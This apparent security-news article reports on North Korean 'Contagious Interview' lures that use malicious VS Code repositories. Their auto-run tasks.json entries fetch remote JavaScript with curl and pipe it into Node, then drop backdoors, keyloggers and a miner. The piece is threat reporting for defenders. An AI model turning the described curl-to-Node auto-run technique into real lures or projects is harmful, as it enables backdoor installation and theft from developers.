North Korean Hackers Attack Devs via Malicious vs Code Projects -

Post Views: 19

“Recently, Developers are targeted by North Korean Hackers through Malicious vs Code Projects.”

Malicious Microsoft Visual Studio Code (VS Code) projects have been seen to be used as lures by North Korean threat actors connected to the ongoing Contagious Interview campaign in order to install a backdoor on compromised endpoints.

Jamf Threat Labs

The most recent discovery shows how the new strategy, which was initially identified in December 2025, is still evolving.

“The ongoing development of DPRK-affiliated threat actors is demonstrated by this activity, as they constantly modify their distribution methods and tooling to comply with genuine developer workflows.”

“The misuse of Node.js execution and Visual Studio Code task configuration files shows how these methods are still evolving alongside widely used development tools.”

Thijs Xhaflaire, Security Researcher, Report

“In this action, a backdoor implant that enables remote code execution on the victim system was deployed.”

“Visual Studio Code asks the user to trust the repository creator when they launch the project.”

“The repository’s tasks.json configuration file is automatically processed by the application if that trust is approved, which may cause embedded arbitrary commands to be run on the system.”

“This causes a background shell command to run on macOS systems, which retrieves a JavaScript payload remotely and pipes it straight into the Node.js runtime using nohup bash -c and curl -s. This suppresses all command output while enabling independent execution in the event that the Visual Studio Code process is terminated.”

The assault, which was first revealed by OpenSourceMalware last month, basically entails telling potential targets to clone a repository on GitHub, GitLab, or Bitbucket and start the project in Visual Studio Code as part of a purported job assessment.

Depending on the operating system on the compromised server, the ultimate objective of these efforts is to exploit VS Code task configuration files to run malicious payloads placed on Vercel domains. By choosing the “runOn: folderOpen” option, the task is set up to run each time that file or any other file in the project folder is opened in Visual Studio Code. BeaverTail and InvisibleFerret are eventually deployed as a result of this.

It has been discovered that later versions of the campaign hide complex multi-stage droppers in task configuration files by disguising the malware as benign spell-check dictionaries as a backup plan in case the task fails to collect the payload from the Vercel domain.

As before, when the victim opens the project in the integrated development environment (IDE), the obfuscated JavaScript included with these files is executed. It connects to a distant server (“ip-regions-check.vercel[.]app”) and runs any JavaScript code it receives. Another deeply obfuscated JavaScript is used as the attack’s last phase.

According to Jamf, the threat actors used a previously unreported infection technique to deploy a backdoor that allows remote code execution on the infected machine, marking yet another shift in this campaign. In the same way, the attack chain begins when the victim uses Visual Studio Code to clone and access a rogue Git repository.

The primary backdoor functionality to create a persistent execution loop that gathers fundamental host data and interacts with a distant server to enable remote code execution, system fingerprinting, and continuous communication is contained in the JavaScript payload, which is hosted on Vercel.

In one instance, approximately eight minutes after the initial infection, the Apple device management company reported seeing additional JavaScript instructions being performed. The freshly downloaded JavaScript is intended to run more JavaScript, beacon to the server every five seconds, and remove any evidence of its activity when it receives a signal from the operator. The inclusion of inline remarks and language in the source code raises the possibility that the script was created using an artificial intelligence (AI) tool.

Because they frequently have exclusive access to financial assets, digital wallets, and technical infrastructure, threat actors with ties to the Democratic People’s Republic of Korea (DPRK) are known to target software engineers, especially those employed in the cryptocurrency, blockchain, and fintech industries.

Attackers may be able to obtain source code, intellectual property, internal systems, and digital assets without authorization if their accounts and systems are compromised. These constant adjustments to their strategies are perceived as an attempt to increase the effectiveness of their cyber espionage and financial objectives in order to support the regime that is highly sanctioned.

The development coincides with Red Asgard’s study into a malicious repository that was discovered to employ a VS Code task setup to get obfuscated JavaScript intended to drop an XMRig bitcoin miner and a full-featured backdoor called Tsunami (also known as TsunamiKit).

An unidentified victim was contacted on LinkedIn by threat actors posing as the chief technology officer of a project named Meta2140. The threat actors shared a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code, according to another analysis from Security Alliance last week that detailed the campaign’s abuse of VS Code tasks.

It’s interesting to note that the attack chain is designed to fall back to two different approaches: installing a malicious npm dependency called “grayavatar” or executing JavaScript code that retrieves a sophisticated Node.js controller. This controller then runs five different modules to log keystrokes, take screenshots, scan the system’s home directory for sensitive files, replace wallet addresses copied to the clipboard, credentials from web browsers, and create a persistent connection to a remote server.

The malware then uses a stager script to create a parallel Python environment that allows for keylogging, data collecting, XMRig bitcoin mining, and AnyDesk deployment for remote access. Notably, the Python and Node.js layers are called InvisibleFerret and BeaverTail, respectively.

These results suggest that the state-sponsored actors are simultaneously experimenting with various delivery mechanisms to boost the probability that their attacks will be successful.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”